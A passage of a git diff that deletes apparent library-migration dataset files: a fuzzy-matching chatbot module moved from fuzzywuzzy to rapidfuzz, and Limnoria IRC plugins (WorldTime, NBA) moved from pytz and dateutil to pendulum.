logging.getLogger(__name__) - - -LIMIT = 1000000 - - -def get_data(name): - """ replacement for nlpia.loaders.get_data to avoid dependencies that result in version conflicts - - >>> get_data('movie_dialog').shape - (64350, 2) - """ - return pd.read_csv(os.path.join(DATA_DIR, name + '.csv')) - - -def normalize(text): - return text.lower() - - -def scale_probability(p): - """ Levenshtein similarity is only good when it's high, when it's low, the score should go down """ - return p ** 2 - - -def load_faq(faq_path=os.path.join(DATA_DIR, 'dsfaq_plus_faq_data_science_and_machine_learning.yml')): - faq = None - with open(faq_path, 'r') as instream: - try: - faq = yaml.safe_load(instream) - except yaml.YAMLError as e: - print(e) - raise(e) - for i, qa in enumerate(faq): - if not isinstance(qa, dict): - faq[i] = {} - log.warning(f'qa #{i} was not a dict') - continue - for k in qa: - if k.lower() != k: - qa[k.lower()] = qa.pop(k) - # if 'q' not in qa: - # log.warning(f'qa #{i} had no Question: {list(qa)} {qa[list(qa)[0]]}') - # qa['q'] = qa.pop('q_student', qa.pop('q_student2', qa.pop('q_teacher'))) - # if 'a' not in qa: - # log.warning(f'qa #{i} had no Answer: {list(qa)} {qa[list(qa)[0]]}') - # qa['a'] = 
qa.pop('a_teacher', qa.pop('a_teacher2', qa.pop('a_student'))) - # continue - faq = pd.DataFrame(faq) - faq = faq.dropna() - return faq - - -class Bot: - db = None - - def __init__(self, name='movie_dialog'): - self.limit = LIMIT - self.name = name - # TODO: make this lazy, do it inside reply() - self.db = self.load_dialog(name=name) - - def load_dialog(self, name='movie_dialog'): - log.warning('Loading movie dialog...') - if name == 'dsfaq': - db = load_faq() - else: - db = get_data(name) - log.info(f'Loaded {len(db)} {self.name} statement-reply pairs.') - if self.limit <= len(db): - log.info(f'Limiting {self.name} database to {self.limit} statement-reply pairs.') - db = db.iloc[:self.limit] - db = dict(zip(db[db.columns[0]], db[db.columns[1]])) - return db - - def reply(self, statement, db=None): - """ Use fuzzywuzzy to find the closest key in the dictionary then return the value for that key - - >>> bot = MovieBot() - >>> reply = bot.reply - >>> reply('hey', {'hello': 'world', 'goodbye': 'fantasy'}) - (0.3, 'fantasy') - >>> reply("Hi!") - (1.0, 'hey there. tired of breathing?') - """ - if self.db is None: - self.db = db - if self.db is None: - self.db = self.load_dialog() - movie_statement, percent_match, movie_reply = process.extractOne( - normalize(statement), choices=self.db) - log.info(f'Closest movie_statement = {movie_statement}') - return [((percent_match / 100.), movie_reply)] - - -# class FAQBot(Bot): -# def __init__(self, name='dsfaq'): -# self.limit = LIMIT -# # TODO: make this lazy, do it inside reply() -# self.db = self.load_dialog(name=name) -# BOTS = (Bot, FAQBot) - -if __name__ == '__main__': - if len(sys.argv) > 1: - bot = Bot() - statement = "Hi!" - statement = ' '.join(sys.argv[1:]) - print(bot.reply(statement)) diff --git a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.target.py b/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.target.py deleted file mode 100644 index c40ea83..0000000 --- a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.target.py +++ /dev/null @@ -1,117 +0,0 @@ -""" Text search to retrieve a statement """ -import logging -import sys -import os - -import yaml -import pandas as pd -from rapidfuzz import process -from ..constants import DATA_DIR - -log = logging.getLogger(__name__) - - -LIMIT = 1000000 - - -def get_data(name): - """ replacement for nlpia.loaders.get_data to avoid dependencies that result in version conflicts - - >>> get_data('movie_dialog').shape - (64350, 2) - """ - return pd.read_csv(os.path.join(DATA_DIR, name + '.csv')) - - -def normalize(text): - return text.lower() - - -def scale_probability(p): - """ Levenshtein similarity is only good when it's high, when it's low, the score should go down """ - return p ** 2 - - -def load_faq(faq_path=os.path.join(DATA_DIR, 'dsfaq_plus_faq_data_science_and_machine_learning.yml')): - faq = None - with open(faq_path, 'r') as instream: - try: - faq = yaml.safe_load(instream) - except yaml.YAMLError as e: - print(e) - raise(e) - for i, qa in enumerate(faq): - if not isinstance(qa, dict): - faq[i] = {} - log.warning(f'qa #{i} was not a dict') - continue - for k in qa: - if k.lower() != k: - qa[k.lower()] = qa.pop(k) - # if 'q' not in qa: - # log.warning(f'qa #{i} had no Question: {list(qa)} {qa[list(qa)[0]]}') - # qa['q'] = qa.pop('q_student', qa.pop('q_student2', qa.pop('q_teacher'))) - # if 'a' not in qa: - # log.warning(f'qa #{i} had no Answer: {list(qa)} {qa[list(qa)[0]]}') - # qa['a'] = qa.pop('a_teacher', 
qa.pop('a_teacher2', qa.pop('a_student'))) - # continue - faq = pd.DataFrame(faq) - faq = faq.dropna() - return faq - - -class Bot: - db = None - - def __init__(self, name='movie_dialog'): - self.limit = LIMIT - self.name = name - # TODO: make this lazy, do it inside reply() - self.db = self.load_dialog(name=name) - - def load_dialog(self, name='movie_dialog'): - log.warning('Loading movie dialog...') - if name == 'dsfaq': - db = load_faq() - else: - db = get_data(name) - log.info(f'Loaded {len(db)} {self.name} statement-reply pairs.') - if self.limit <= len(db): - log.info(f'Limiting {self.name} database to {self.limit} statement-reply pairs.') - db = db.iloc[:self.limit] - db = dict(zip(db[db.columns[0]], db[db.columns[1]])) - return db - - def reply(self, statement, db=None): - """ Use rapidfuzz to find the closest key in the dictionary then return the value for that key - - >>> bot = MovieBot() - >>> reply = bot.reply - >>> reply('hey', {'hello': 'world', 'goodbye': 'fantasy'}) - (0.3, 'fantasy') - >>> reply("Hi!") - (1.0, 'hey there. tired of breathing?') - """ - if self.db is None: - self.db = db - if self.db is None: - self.db = self.load_dialog() - movie_statement, percent_match, movie_reply = process.extractOne( - normalize(statement), choices=self.db) - log.info(f'Closest movie_statement = {movie_statement}') - return [((percent_match / 100.), movie_reply)] - - -# class FAQBot(Bot): -# def __init__(self, name='dsfaq'): -# self.limit = LIMIT -# # TODO: make this lazy, do it inside reply() -# self.db = self.load_dialog(name=name) -# BOTS = (Bot, FAQBot) - -if __name__ == '__main__': - if len(sys.argv) > 1: - bot = Bot() - statement = "Hi!" - statement = ' '.join(sys.argv[1:]) - print(bot.reply(statement)) diff --git a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.diff b/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.diff deleted file mode 100644 index f657bb4..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.diff +++ /dev/null @@ -1,46 +0,0 @@ -diff --git a/WorldTime/plugin.py b/WorldTime/plugin.py - index bbe015d69556fe33bfee7231c9ba12bb7f728b75..2c40713d3a2778d6f729d896372c3bcd74302104 100644 - --- a/WorldTime/plugin.py - +++ b/WorldTime/plugin.py -@@ -9,9 +9,8 @@ - import sys - import json - import time --import pytz --import datetime - import pickle -+import pendulum - - # supybot libs - import supybot.utils as utils -@@ -79,15 +78,14 @@ class WorldTime(callbacks.Plugin): - # TIME FUNCTIONS # - ################## - -- def _converttz(self, msg, s, outputTZ): -+ def _converttz(self, msg, outputTZ): - """Convert epoch seconds to a HH:MM readable string.""" - - # now do some timezone math. - try: -- dtobj = datetime.datetime.fromtimestamp(s, tz=pytz.timezone(outputTZ)) # convert epoch into aware dtobj. -+ dt = pendulum.now(outputTZ) - outstrf = self.registryValue("format", msg.args[0]) -- local_dt = dtobj.astimezone(pytz.timezone(outputTZ)) -- return local_dt.strftime(outstrf) -+ return dt.strftime(outstrf) - except Exception as e: - self.log.info("WorldTime: ERROR: _converttz: {0}".format(e)) - -@@ -174,10 +172,7 @@ class WorldTime(callbacks.Plugin): - if not ll: - irc.error("I could not find the local timezone for: {0}. Bad location? Spelled wrong?".format(location), Raise=True) - # if we're here, we have localtime zone. -- utcnow = int(time.time()) # grab UTC now. -- # localtm = utcnow+ll['rawOffset'] # grab raw offset from -- # now lets use pytz to convert into the localtime in the place. 
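The qary files above swap fuzzywuzzy for rapidfuzz with a one-line import change. rapidfuzz's process.extractOne always returns a (choice, score, key-or-index) triple with float 0-100 scores, so the three-way unpacking in reply() keeps working. A minimal sketch with illustrative choices:

    from rapidfuzz import process

    choices = ["hello", "goodbye"]
    match, score, index = process.extractOne("hey", choices)
    print(match, round(score, 1), index)  # best match, 0-100 score, list index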
-- lt = self._converttz(msg, utcnow, ll['timeZoneId']) -+ lt = self._converttz(msg, ll['timeZoneId']) - if lt: # make sure we get it back. - if sys.version_info[0] <= 2: - s = "{0} :: Current local time is: {1} ({2})".format(ircutils.bold(gc['place'].encode('utf-8')), lt, ll['timeZoneName'].encode('utf-8')) diff --git a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.source.py b/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.source.py deleted file mode 100644 index 4de97f9..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.source.py +++ /dev/null @@ -1,217 +0,0 @@ -### -# Copyright (c) 2014, spline -# All rights reserved. -# -# -### - -# my libs -import sys -import json -import time -import pytz -import datetime -import pickle - -# supybot libs -import supybot.utils as utils -from supybot.commands import * -import supybot.plugins as plugins -import supybot.ircutils as ircutils -import supybot.callbacks as callbacks -import supybot.world as world -import supybot.conf as conf -import supybot.log as log -try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('WorldTime') -except ImportError: - # Placeholder that allows to run the plugin on a bot - # without the i18n module - _ = lambda x:x - -filename = conf.supybot.directories.data.dirize('WorldTime.db') - -HEADERS = { - 'User-agent': 'Mozilla/5.0 (compatible; Supybot/Limnoria %s; WorldTime plugin)' % conf.version -} - -class WorldTime(callbacks.Plugin): - """Add the help for "@plugin help WorldTime" here - This should describe *how* to use this plugin.""" - threaded = True - - ############################### - # DATABASE HANDLING FUNCTIONS # - ############################### - - def __init__(self, irc): - self.__parent = super(WorldTime, self) - self.__parent.__init__(irc) - self.db = {} - self._loadDb() - world.flushers.append(self._flushDb) - - def _loadDb(self): - """Loads the (flatfile) database mapping ident@hosts to timezones.""" - - try: - with open(filename, 'rb') as f: - self.db = pickle.load(f) - except Exception as e: - self.log.debug('WorldTime: Unable to load pickled database: %s', e) - - def _flushDb(self): - """Flushes the (flatfile) database mapping ident@hosts to timezones.""" - - try: - with open(filename, 'wb') as f: - pickle.dump(self.db, f, 2) - except Exception as e: - self.log.warning('WorldTime: Unable to write pickled database: %s', e) - - def die(self): - self._flushDb() - world.flushers.remove(self._flushDb) - self.__parent.die() - - ################## - # TIME FUNCTIONS # - ################## - - def _converttz(self, msg, s, outputTZ): - """Convert epoch seconds to a HH:MM readable string.""" - - # now do some timezone math. - try: - dtobj = datetime.datetime.fromtimestamp(s, tz=pytz.timezone(outputTZ)) # convert epoch into aware dtobj. 
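The WorldTime hunk above replaces the epoch-plus-pytz dance with a single pendulum call: pendulum.now(tz) already yields an aware datetime in the target zone, so no fromtimestamp/astimezone round-trip is needed. A minimal sketch, with the zone and format as illustrative values rather than the plugin's registry settings:

    import pendulum

    # Old route (the deleted source): epoch seconds -> pytz-aware datetime.
    # New route: ask pendulum for "now" in the target zone directly.
    dt = pendulum.now("US/Eastern")
    print(dt.strftime("%H:%M"))  # e.g. "14:05"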
- outstrf = self.registryValue("format", msg.args[0]) - local_dt = dtobj.astimezone(pytz.timezone(outputTZ)) - return local_dt.strftime(outstrf) - except Exception as e: - self.log.info("WorldTime: ERROR: _converttz: {0}".format(e)) - - ############## - # GAPI STUFF # - ############## - - def _getlatlng(self, location): - api_key = self.registryValue('mapsAPIkey') - location = utils.web.urlquote(location) - url = 'https://maps.googleapis.com/maps/api/geocode/json?address=%s&sensor=false&key=%s' % (location, api_key) - - # try and fetch url - try: - response = utils.web.getUrl(url, headers=HEADERS) - except utils.web.Error as e: - log.debug(str(e)) - - # wrap in a big try/except - try: - result = json.loads(response.decode('utf-8')) - if result['status'] == 'OK': - lat = str(result['results'][0]['geometry']['location']['lat']) - lng = str(result['results'][0]['geometry']['location']['lng']) - place = (result['results'][0]['formatted_address']) - ll = '%s,%s' % (lat, lng) # lat+long into a single string. - return {'place':place, 'll':ll} - else: - self.log.info("ERROR: _getlatlng: status result NOT ok. Result: {0}".format(result)) - except Exception as e: - self.log.info("ERROR: _getlatlng: {0}".format(e)) - - def _gettime(self, latlng): - api_key = self.registryValue('mapsAPIkey') - latlng = utils.web.urlquote(latlng) - url = 'https://maps.googleapis.com/maps/api/timezone/json?location=%s&sensor=false×tamp=%s&key=%s' % (latlng, time.time(), api_key) - - # try and fetch url - try: - response = utils.web.getUrl(url, headers=HEADERS) - except utils.web.Error as e: - log.debug(str(e)) - - # wrap in a big try/except - try: - result = json.loads(response.decode('utf-8')) - if result['status'] == 'OK': - return result - else: - self.log.info("WorldTime: _gettime: status result NOT ok. Result: {0}".format(result)) - except Exception as e: - self.log.info("WorldTime: _gettime: {0}".format(e)) - - ################### - # PUBLIC FUNCTION # - ################### - - def worldtime(self, irc, msg, args, opts, location): - """[--nick ] - - Query GAPIs for and attempt to figure out local time. [] - is only required if you have not yet set a location for yourself using the 'set' - command. If --nick is given, try looking up the location for . - """ - opts = dict(opts) - if not location: - try: - if 'nick' in opts: - host = irc.state.nickToHostmask(opts['nick']) - else: - host = msg.prefix - ih = host.split('!')[1] - location = self.db[ih] - except KeyError: - irc.error("No location for %s is set. Use the 'set' command " - "to set a location for your current hostmask, or call 'worldtime' " - "with as an argument." % ircutils.bold('*!'+ih), Raise=True) - # first, grab lat and long for user location - gc = self._getlatlng(location) - if not gc: - irc.error("I could not find the location for: {0}. Bad location? Spelled wrong?".format(location), Raise=True) - # next, lets grab the localtime for that location w/lat+long. - ll = self._gettime(gc['ll']) - if not ll: - irc.error("I could not find the local timezone for: {0}. Bad location? Spelled wrong?".format(location), Raise=True) - # if we're here, we have localtime zone. - utcnow = int(time.time()) # grab UTC now. - # localtm = utcnow+ll['rawOffset'] # grab raw offset from - # now lets use pytz to convert into the localtime in the place. - lt = self._converttz(msg, utcnow, ll['timeZoneId']) - if lt: # make sure we get it back. 
- if sys.version_info[0] <= 2: - s = "{0} :: Current local time is: {1} ({2})".format(ircutils.bold(gc['place'].encode('utf-8')), lt, ll['timeZoneName'].encode('utf-8')) - else: - s ="{0} :: Current local time is: {1} ({2})".format(ircutils.bold(gc['place']), lt, ll['timeZoneName']) - if self.registryValue('disableANSI', msg.args[0]): - s = ircutils.stripFormatting(s) - irc.reply(s) - else: - irc.error("Something went wrong during conversion to timezone. Check the logs.", Raise=True) - - worldtime = wrap(worldtime, [getopts({'nick': 'nick'}), additional('text')]) - - def set(self, irc, msg, args, timezone): - """ - - Sets the location for your current ident@host to .""" - ih = msg.prefix.split('!')[1] - self.db[ih] = timezone - irc.replySuccess() - set = wrap(set, ['text']) - - def unset(self, irc, msg, args): - """takes no arguments. - - Unsets the location for your current ident@host.""" - ih = msg.prefix.split('!')[1] - try: - del self.db[ih] - irc.replySuccess() - except KeyError: - irc.error("No entry for %s exists." % ircutils.bold('*!'+ih), Raise=True) - -Class = WorldTime - - -# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: diff --git a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.target.py b/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.target.py deleted file mode 100644 index 197feb6..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.target.py +++ /dev/null @@ -1,212 +0,0 @@ -### -# Copyright (c) 2014, spline -# All rights reserved. -# -# -### - -# my libs -import sys -import json -import time -import pickle -import pendulum - -# supybot libs -import supybot.utils as utils -from supybot.commands import * -import supybot.plugins as plugins -import supybot.ircutils as ircutils -import supybot.callbacks as callbacks -import supybot.world as world -import supybot.conf as conf -import supybot.log as log -try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('WorldTime') -except ImportError: - # Placeholder that allows to run the plugin on a bot - # without the i18n module - _ = lambda x:x - -filename = conf.supybot.directories.data.dirize('WorldTime.db') - -HEADERS = { - 'User-agent': 'Mozilla/5.0 (compatible; Supybot/Limnoria %s; WorldTime plugin)' % conf.version -} - -class WorldTime(callbacks.Plugin): - """Add the help for "@plugin help WorldTime" here - This should describe *how* to use this plugin.""" - threaded = True - - ############################### - # DATABASE HANDLING FUNCTIONS # - ############################### - - def __init__(self, irc): - self.__parent = super(WorldTime, self) - self.__parent.__init__(irc) - self.db = {} - self._loadDb() - world.flushers.append(self._flushDb) - - def _loadDb(self): - """Loads the (flatfile) database mapping ident@hosts to timezones.""" - - try: - with open(filename, 'rb') as f: - self.db = pickle.load(f) - except Exception as e: - self.log.debug('WorldTime: Unable to load pickled database: %s', e) - - def _flushDb(self): - """Flushes the (flatfile) database mapping ident@hosts to timezones.""" - - try: - with open(filename, 'wb') as f: - pickle.dump(self.db, f, 2) - except Exception as e: - self.log.warning('WorldTime: Unable to write pickled database: %s', e) - - def die(self): - self._flushDb() - world.flushers.remove(self._flushDb) - self.__parent.die() - - ################## - # TIME FUNCTIONS # - ################## - - def _converttz(self, msg, outputTZ): - """Convert epoch seconds to a 
HH:MM readable string.""" - - # now do some timezone math. - try: - dt = pendulum.now(outputTZ) - outstrf = self.registryValue("format", msg.args[0]) - return dt.strftime(outstrf) - except Exception as e: - self.log.info("WorldTime: ERROR: _converttz: {0}".format(e)) - - ############## - # GAPI STUFF # - ############## - - def _getlatlng(self, location): - api_key = self.registryValue('mapsAPIkey') - location = utils.web.urlquote(location) - url = 'https://maps.googleapis.com/maps/api/geocode/json?address=%s&sensor=false&key=%s' % (location, api_key) - - # try and fetch url - try: - response = utils.web.getUrl(url, headers=HEADERS) - except utils.web.Error as e: - log.debug(str(e)) - - # wrap in a big try/except - try: - result = json.loads(response.decode('utf-8')) - if result['status'] == 'OK': - lat = str(result['results'][0]['geometry']['location']['lat']) - lng = str(result['results'][0]['geometry']['location']['lng']) - place = (result['results'][0]['formatted_address']) - ll = '%s,%s' % (lat, lng) # lat+long into a single string. - return {'place':place, 'll':ll} - else: - self.log.info("ERROR: _getlatlng: status result NOT ok. Result: {0}".format(result)) - except Exception as e: - self.log.info("ERROR: _getlatlng: {0}".format(e)) - - def _gettime(self, latlng): - api_key = self.registryValue('mapsAPIkey') - latlng = utils.web.urlquote(latlng) - url = 'https://maps.googleapis.com/maps/api/timezone/json?location=%s&sensor=false×tamp=%s&key=%s' % (latlng, time.time(), api_key) - - # try and fetch url - try: - response = utils.web.getUrl(url, headers=HEADERS) - except utils.web.Error as e: - log.debug(str(e)) - - # wrap in a big try/except - try: - result = json.loads(response.decode('utf-8')) - if result['status'] == 'OK': - return result - else: - self.log.info("WorldTime: _gettime: status result NOT ok. Result: {0}".format(result)) - except Exception as e: - self.log.info("WorldTime: _gettime: {0}".format(e)) - - ################### - # PUBLIC FUNCTION # - ################### - - def worldtime(self, irc, msg, args, opts, location): - """[--nick ] - - Query GAPIs for and attempt to figure out local time. [] - is only required if you have not yet set a location for yourself using the 'set' - command. If --nick is given, try looking up the location for . - """ - opts = dict(opts) - if not location: - try: - if 'nick' in opts: - host = irc.state.nickToHostmask(opts['nick']) - else: - host = msg.prefix - ih = host.split('!')[1] - location = self.db[ih] - except KeyError: - irc.error("No location for %s is set. Use the 'set' command " - "to set a location for your current hostmask, or call 'worldtime' " - "with as an argument." % ircutils.bold('*!'+ih), Raise=True) - # first, grab lat and long for user location - gc = self._getlatlng(location) - if not gc: - irc.error("I could not find the location for: {0}. Bad location? Spelled wrong?".format(location), Raise=True) - # next, lets grab the localtime for that location w/lat+long. - ll = self._gettime(gc['ll']) - if not ll: - irc.error("I could not find the local timezone for: {0}. Bad location? Spelled wrong?".format(location), Raise=True) - # if we're here, we have localtime zone. - lt = self._converttz(msg, ll['timeZoneId']) - if lt: # make sure we get it back. 
-            if sys.version_info[0] <= 2:
-                s = "{0} :: Current local time is: {1} ({2})".format(ircutils.bold(gc['place'].encode('utf-8')), lt, ll['timeZoneName'].encode('utf-8'))
-            else:
-                s ="{0} :: Current local time is: {1} ({2})".format(ircutils.bold(gc['place']), lt, ll['timeZoneName'])
-            if self.registryValue('disableANSI', msg.args[0]):
-                s = ircutils.stripFormatting(s)
-            irc.reply(s)
-        else:
-            irc.error("Something went wrong during conversion to timezone. Check the logs.", Raise=True)
-
-    worldtime = wrap(worldtime, [getopts({'nick': 'nick'}), additional('text')])
-
-    def set(self, irc, msg, args, timezone):
-        """<location>
-
-        Sets the location for your current ident@host to <location>."""
-        ih = msg.prefix.split('!')[1]
-        self.db[ih] = timezone
-        irc.replySuccess()
-    set = wrap(set, ['text'])
-
-    def unset(self, irc, msg, args):
-        """takes no arguments.
-
-        Unsets the location for your current ident@host."""
-        ih = msg.prefix.split('!')[1]
-        try:
-            del self.db[ih]
-            irc.replySuccess()
-        except KeyError:
-            irc.error("No entry for %s exists." % ircutils.bold('*!'+ih), Raise=True)
-
-Class = WorldTime
-
-
-# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
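
The WorldTime target above collapses the source's epoch arithmetic into a single pendulum call in `_converttz`. A minimal standalone sketch of that pattern (illustrative names only; it assumes nothing beyond an installed `pendulum`):

    import pendulum

    def local_time_string(tz_name, fmt='%I:%M %p (%Z)'):
        # pendulum.now() accepts an IANA timezone name directly, so no
        # separate pytz.timezone(...) lookup or epoch conversion is needed.
        return pendulum.now(tz_name).strftime(fmt)

    print(local_time_string('US/Eastern'))
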
- """ -- date = dateutil.parser.parse(iso) -- date_eastern = date.astimezone(pytz.timezone('US/Eastern')) -+ date = pendulum.parse(iso) -+ date_eastern = date.in_tz('US/Eastern') - eastern_date = date_eastern.strftime('%a %m/%d') - return "{}".format(eastern_date) - -@@ -692,8 +695,8 @@ class NBA(callbacks.Plugin): - Eastern time formatted with am/pm. - (The default human-readable format for the listing of games). - """ -- date = dateutil.parser.parse(iso) -- date_eastern = date.astimezone(pytz.timezone('US/Eastern')) -+ date = pendulum.parse(iso) -+ date_eastern = date.in_tz('US/Eastern') - eastern_time = date_eastern.strftime('%-I:%M %p') - return "{} ET".format(eastern_time) - -@@ -702,8 +705,8 @@ class NBA(callbacks.Plugin): - """Convert the ISO date in UTC time that the API outputs into a - string with a date and Eastern time formatted with am/pm. - """ -- date = dateutil.parser.parse(iso) -- date_eastern = date.astimezone(pytz.timezone('US/Eastern')) -+ date = pendulum.parse(iso) -+ date_eastern = date.in_tz('US/Eastern') - eastern_datetime = date_eastern.strftime('%a %m/%d, %I:%M %p') - return "{} ET".format(eastern_datetime) - -@@ -723,8 +726,7 @@ class NBA(callbacks.Plugin): - elif date == 'tomorrow': - day_delta = 1 - # Calculate the day difference and return a string -- date_string = (cls._pacificTimeNow() + -- datetime.timedelta(days=day_delta)).strftime('%Y%m%d') -+ date_string = cls._pacificTimeNow().add(days=day_delta).strftime('%Y%m%d') - return date_string - - @classmethod -@@ -767,12 +769,12 @@ class NBA(callbacks.Plugin): - - elif date.replace('-', '').isdigit(): - try: -- parsed_date = datetime.datetime.strptime(date, '%Y-%m-%d') -+ parsed_date = pendulum.from_format(date, 'YYYY-MM-DD') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - - # The current API goes back until 2014-10-04. Is it in range? -- if parsed_date.date() < datetime.date(2014, 10, 4): -+ if parsed_date < pendulum.datetime(2014, 10, 4): - raise ValueError('I can only go back until 2014-10-04') - else: - raise ValueError('Date is not valid') diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.source.py b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.source.py deleted file mode 100644 index fc86def..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.source.py +++ /dev/null @@ -1,829 +0,0 @@ -### -# Copyright (c) 2018, Santiago Gil -# Copyright (c) 2020, oddluck -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# -# * Redistributions of source code must retain the above copyright notice, -# this list of conditions, and the following disclaimer. -# * Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions, and the following disclaimer in the -# documentation and/or other materials provided with the distribution. -# * Neither the name of the author of this software nor the name of -# contributors to this software may be used to endorse or promote products -# derived from this software without specific prior written consent. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. 
diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.source.py b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.source.py
deleted file mode 100644
index fc86def..0000000
--- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.source.py
+++ /dev/null
@@ -1,829 +0,0 @@
-###
-# Copyright (c) 2018, Santiago Gil
-# Copyright (c) 2020, oddluck
-# All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without
-# modification, are permitted provided that the following conditions are met:
-#
-#   * Redistributions of source code must retain the above copyright notice,
-#     this list of conditions, and the following disclaimer.
-#   * Redistributions in binary form must reproduce the above copyright notice,
-#     this list of conditions, and the following disclaimer in the
-#     documentation and/or other materials provided with the distribution.
-#   * Neither the name of the author of this software nor the name of
-#     contributors to this software may be used to endorse or promote products
-#     derived from this software without specific prior written consent.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
-# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
-# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
-# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
-# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
-# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
-# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-# POSSIBILITY OF SUCH DAMAGE.
-###
-
-#import supybot.utils as utils
-#from supybot.commands import *
-from supybot.commands import optional, wrap
-
-#import supybot.plugins as plugins
-import supybot.ircutils as ircutils
-import supybot.callbacks as callbacks
-try:
-    from supybot.i18n import PluginInternationalization
-    _ = PluginInternationalization('NBA')
-except ImportError:
-    # Placeholder that allows to run the plugin on a bot
-    # without the i18n module
-    _ = lambda x: x
-
-import datetime
-import dateutil.parser
-import httplib2
-import json
-import pytz
-from xml.etree import ElementTree
-
-class NBA(callbacks.Plugin):
-    """Get scores from NBA.com."""
-
-    _ENDPOINT_BASE_URL = 'https://data.nba.net'
-
-    _SCOREBOARD_ENDPOINT = (_ENDPOINT_BASE_URL
-                            + '/10s/prod/v2/{}/'
-                            + 'scoreboard.json')
-
-    _TODAY_ENDPOINT = (_ENDPOINT_BASE_URL
-                       + '/prod/v3/today.json')
-
-    _FUZZY_DAYS = frozenset(('yesterday', 'tonight',
-                             'today', 'tomorrow'))
-
-    _TEAM_TRICODES = frozenset(('CHA', 'ATL', 'IND', 'MEM', 'DET',
-                                'UTA', 'CHI', 'TOR', 'CLE', 'OKC',
-                                'DAL', 'MIN', 'BOS', 'SAS', 'MIA',
-                                'DEN', 'LAL', 'PHX', 'NOP', 'MIL',
-                                'HOU', 'NYK', 'ORL', 'SAC', 'PHI',
-                                'BKN', 'POR', 'GSW', 'LAC', 'WAS'))
-
-    def __init__(self, irc):
-        self.__parent = super(NBA, self)
-        self.__parent.__init__(irc)
-
-        self._http = httplib2.Http('.cache')
-
-    def nba(self, irc, msg, args, optional_team, optional_date):
-        """[<team>] [<date>]
-
-        Get games for a given date. If none is specified, return
-        games scheduled for today. Optionally add team abbreviation
-        to filter for a specific team.
-        """
-
-        # Check to see if there's optional input and if there is check
-        # if it's a date or a team, or both.
-        try:
-            team, date = self._parseOptionalArguments(optional_team,
-                                                      optional_date)
-        except ValueError as error:
-            irc.error(str(error))
-            return
-
-        try:
-            games = self._getTodayGames() if date is None \
-                    else self._getGamesForDate(date)
-        except ConnectionError as error:
-            irc.error('Could not connect to nba.com')
-            return
-        except:
-            irc.error('Something went wrong')
-            return
-
-        games = self._filterGamesWithTeam(team, games)
-
-        games_string = self._resultAsString(games)
-
-        # Single game query? We can show some extra info.
-        if len(games) == 1:
-            game = games[0]
-
-            # If the game has ended, we fetch the recap info from NBA.com:
-            if game['ended']:
-                try:
-                    recap = self._getRecapInfo(game)
-                    games_string += ' | {} {}'.format(ircutils.bold('Recap:'),
-                                                      recap)
-                except:
-                    pass
-
-            else:
-                # Otherwise, when querying a specific game in progress,
-                # we show the broadcaster list.
-                # Also, if it has a text nugget, and it's not
-                # 'Watch live', we show it:
-                broadcasters = game['tv_broadcasters']
-                broadcasters_string = self._broadcastersToString(broadcasters)
-                games_string += ' [{}]'.format(broadcasters_string)
-
-                nugget = game['text_nugget']
-                nugget_is_interesting = nugget and 'Watch live' not in nugget
-                if nugget_is_interesting:
-                    games_string += ' | {}'.format(nugget)
-
-        irc.reply(games_string)
-
-    nba = wrap(nba, [optional('somethingWithoutSpaces'),
-                     optional('somethingWithoutSpaces')])
-
-    def nbatv(self, irc, msg, args, team):
-        """[<team>]
-
